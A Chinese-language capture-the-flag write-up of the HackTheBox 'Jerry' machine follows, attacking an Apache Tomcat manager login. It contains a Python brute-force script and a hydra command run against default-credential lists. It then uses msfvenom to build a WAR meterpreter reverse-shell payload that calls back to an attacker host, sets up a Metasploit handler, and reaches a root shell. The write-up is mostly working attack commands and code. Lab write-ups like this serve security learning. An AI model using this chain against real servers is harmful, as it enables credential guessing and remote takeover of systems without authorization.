jerry(apache tomcat的暴力破解方式)

info enum

1
2
3
8080/tcp open  http    Apache Tomcat/Coyote JSP engine 1.1

Apache Tomcat/7.0.88

apache登陆,以前遇到过

当时采取的方式是,通过python脚本,将字典处理为“admin:admin”类似的形式,然后再编码一次。

方(偷)便(懒)起见,用burp intruder模块爆破。

缺点:如果字典过大,burp总是会卡死==

现在又遇到了apache认证,观察以下数据包。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
GET /manager/html HTTP/1.1

Host: 10.10.10.95:8080

User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language: en-US,en;q=0.5

Referer: http://10.10.10.95:8080/

Connection: close

Upgrade-Insecure-Requests: 1

Authorization: Basic MTIzMTIzOjMyMTIz

暴力破解脚本

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
import base64
import requests

url = "http://10.10.10.95:8080/manager/html"
S = requests.Session()

user = open("/usr/share/wordlists/tomcat-betterdefaultpasslist.txt","r")

for each in user.readlines():

	key = base64.b64encode(each)

	what_the_fuck_pass = "Basic "+key

	headers={ 'Host': '10.10.10.95:8080',\

'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0',\

'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',\

'Accept-Language': 'en-US,en;q=0.5',\

'Referer': 'http://10.10.10.95:8080/',\

'Connection': 'close',\

'Upgrade-Insecure-Requests': '1',\

'Authorization': what_the_fuck_pass

}

	send_pass = S.get(url,headers=headers)

	if send_pass.status_code == '200':

		print key

		break

	else:

		#print headers

		print key+"--error"

user.close()

hydra

1
2
3
4
5
apt search seclists
apt-get install seclists
cd /usr/share/seclists/
find . | grep -i tomcat
hydra -C Passwords/Default-Credentials/tomcat-betterdefaultpasslist.txt http-get://10.10.10.95:8080/manager/html

获得弱密码,就可以登陆服务器

上传命令执行脚本

曾经做过war类型文件上传,获取shell

war file是打包好的java代码。select war file to upload

用msfvenom生成war payload

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=kali-ip LPORT=9001 -f war -o xx.war

msfvenom

它用于生成payload。参考资料

msfvenom -l payload 查看所有攻击载荷

msfvenom -l formats

获取shell

1
2
3
4
5
6
msfconsole
use exploit/multi/handler/
set payload windows/x64/meterpreter/reverse_tcp
set LHOST tun0 设置监听的网卡/端口
set LPORT 9001
exploit -j 

1 当上传成功xx.war,就可以访问以下地址,获得一个shell。

http://target.com:8080/xx/krnlxctxgebr.jsp

1
2
3
4
sessions -i 1
getuid
shell
已经获得root权限